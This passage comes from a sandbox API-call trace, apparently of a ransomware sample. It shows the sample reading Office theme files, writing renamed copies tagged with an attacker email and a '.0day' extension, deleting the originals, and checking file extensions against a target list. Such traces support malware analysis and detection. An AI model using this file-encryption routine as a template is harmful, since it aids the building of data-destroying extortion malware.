dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.006] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.006] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.006] GetLastError () returned 0x0 [0274.006] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x5c8c, lpOverlapped=0x0) returned 1 [0274.011] WriteFile (in: hFile=0x318, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x5c90, lpOverlapped=0x0) returned 1 [0274.013] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.013] WriteFile (in: hFile=0x318, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.013] SetEndOfFile (hFile=0x318) returned 1 [0274.013] CloseHandle (hObject=0x318) returned 1 [0274.013] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.013] SetEndOfFile (hFile=0x37c) returned 1 [0274.017] CloseHandle (hObject=0x37c) returned 1 [0274.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 1 [0274.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.017] lstrlenW (lpString=".doc") returned 4 [0274.017] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.017] lstrlenW (lpString=".docx") returned 5 [0274.017] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.017] lstrlenW (lpString=".pdf") returned 4 [0274.017] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.017] lstrlenW (lpString=".xls") returned 4 [0274.018] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".xlsx") returned 5 [0274.018] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.018] lstrlenW (lpString=".ppt") returned 4 [0274.018] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString=".zip") returned 4 [0274.018] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".rar") returned 4 [0274.018] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".bz2") returned 4 [0274.018] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".7z") returned 3 [0274.018] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString=".dbf") returned 4 [0274.018] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString=".1cd") returned 4 [0274.018] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString=".jpg") returned 4 [0274.018] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.018] lstrlenW (lpString=".doc") returned 4 [0274.018] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".docx") returned 5 [0274.018] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.018] lstrlenW (lpString=".pdf") returned 4 [0274.018] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".xls") returned 4 [0274.018] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.018] lstrlenW (lpString=".xlsx") returned 5 [0274.018] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.019] lstrlenW (lpString=".ppt") returned 4 [0274.019] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.019] lstrlenW (lpString=".zip") returned 4 [0274.019] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString=".rar") returned 4 [0274.019] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString=".bz2") returned 4 [0274.019] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString=".7z") returned 3 [0274.019] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.019] lstrlenW (lpString=".dbf") returned 4 [0274.019] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.019] lstrlenW (lpString=".1cd") returned 4 [0274.019] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0274.019] lstrlenW (lpString=".jpg") returned 4 [0274.019] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.019] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0274.019] lstrlenW (lpString="Thatch.eftx") returned 11 [0274.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.020] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=41295) returned 1 [0274.020] CloseHandle (hObject=0x318) returned 1 [0274.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 0x20 [0274.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.021] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.021] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.021] GetLastError () returned 0x0 [0274.021] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xa14f, lpOverlapped=0x0) returned 1 [0274.024] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xa150, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xa150, lpOverlapped=0x0) returned 1 [0274.026] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.026] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.026] SetEndOfFile (hFile=0x300) returned 1 [0274.026] CloseHandle (hObject=0x300) returned 1 [0274.026] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.026] SetEndOfFile (hFile=0x318) returned 1 [0274.030] CloseHandle (hObject=0x318) returned 1 [0274.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 1 [0274.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.030] lstrlenW (lpString=".doc") returned 4 [0274.030] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.030] lstrlenW (lpString=".docx") returned 5 [0274.030] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.030] lstrlenW (lpString=".pdf") returned 4 [0274.030] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.030] lstrlenW (lpString=".xls") returned 4 [0274.030] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.030] lstrlenW (lpString=".xlsx") returned 5 [0274.030] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.030] lstrlenW (lpString=".ppt") returned 4 [0274.030] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.030] lstrlenW (lpString=".zip") returned 4 [0274.030] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".rar") returned 4 [0274.031] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".bz2") returned 4 [0274.031] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".7z") returned 3 [0274.031] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString=".dbf") returned 4 [0274.031] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString=".1cd") returned 4 [0274.031] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString=".jpg") returned 4 [0274.031] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString=".doc") returned 4 [0274.031] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".docx") returned 5 [0274.031] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.031] lstrlenW (lpString=".pdf") returned 4 [0274.031] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".xls") returned 4 [0274.031] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".xlsx") returned 5 [0274.031] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.031] lstrlenW (lpString=".ppt") returned 4 [0274.031] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.031] lstrlenW (lpString=".zip") returned 4 [0274.031] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.031] lstrlenW (lpString=".rar") returned 4 [0274.032] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.032] lstrlenW (lpString=".bz2") returned 4 [0274.032] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.032] lstrlenW (lpString=".7z") returned 3 [0274.032] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.032] lstrlenW (lpString=".dbf") returned 4 [0274.032] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.032] lstrlenW (lpString=".1cd") returned 4 [0274.032] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0274.032] lstrlenW (lpString=".jpg") returned 4 [0274.032] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.032] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0274.032] lstrlenW (lpString="Trek.eftx") returned 9 [0274.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.036] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=129924) returned 1 [0274.036] CloseHandle (hObject=0x318) returned 1 [0274.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 0x20 [0274.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.036] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.036] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.037] GetLastError () returned 0x0 [0274.037] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1fb84, lpOverlapped=0x0) returned 1 [0274.145] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1fb90, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1fb90, lpOverlapped=0x0) returned 1 [0274.148] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.148] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0274.148] SetEndOfFile (hFile=0x300) returned 1 [0274.148] CloseHandle (hObject=0x300) returned 1 [0274.149] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.149] SetEndOfFile (hFile=0x318) returned 1 [0274.153] CloseHandle (hObject=0x318) returned 1 [0274.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.178] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 1 [0274.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.178] lstrlenW (lpString=".doc") returned 4 [0274.178] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.178] lstrlenW (lpString=".docx") returned 5 [0274.178] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.179] lstrlenW (lpString=".pdf") returned 4 [0274.179] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".xls") returned 4 [0274.179] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".xlsx") returned 5 [0274.179] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.179] lstrlenW (lpString=".ppt") returned 4 [0274.179] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString=".zip") returned 4 [0274.179] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".rar") returned 4 [0274.179] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".bz2") returned 4 [0274.179] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".7z") returned 3 [0274.179] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString=".dbf") returned 4 [0274.179] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString=".1cd") returned 4 [0274.179] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString=".jpg") returned 4 [0274.179] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.179] lstrlenW (lpString=".doc") returned 4 [0274.179] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".docx") returned 5 [0274.179] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.179] lstrlenW (lpString=".pdf") returned 4 [0274.179] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".xls") returned 4 [0274.179] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.179] lstrlenW (lpString=".xlsx") returned 5 [0274.180] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.180] lstrlenW (lpString=".ppt") returned 4 [0274.180] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.180] lstrlenW (lpString=".zip") returned 4 [0274.180] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString=".rar") returned 4 [0274.180] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString=".bz2") returned 4 [0274.180] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString=".7z") returned 3 [0274.180] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.180] lstrlenW (lpString=".dbf") returned 4 [0274.180] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.180] lstrlenW (lpString=".1cd") returned 4 [0274.180] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0274.180] lstrlenW (lpString=".jpg") returned 4 [0274.180] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.180] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.180] lstrlenW (lpString="CAGCAT10.DLL") returned 12 [0274.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.181] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=15776) returned 1 [0274.181] CloseHandle (hObject=0x39c) returned 1 [0274.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll")) returned 0x20 [0274.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.181] lstrlenW (lpString=".doc") returned 4 [0274.181] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.181] lstrlenW (lpString=".docx") returned 5 [0274.181] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0274.181] lstrlenW (lpString=".pdf") returned 4 [0274.181] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.181] lstrlenW (lpString=".xls") returned 4 [0274.181] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.181] lstrlenW (lpString=".xlsx") returned 5 [0274.181] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0274.181] lstrlenW (lpString=".ppt") returned 4 [0274.181] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.181] lstrlenW (lpString="C:\\Program Files\\Microsoft 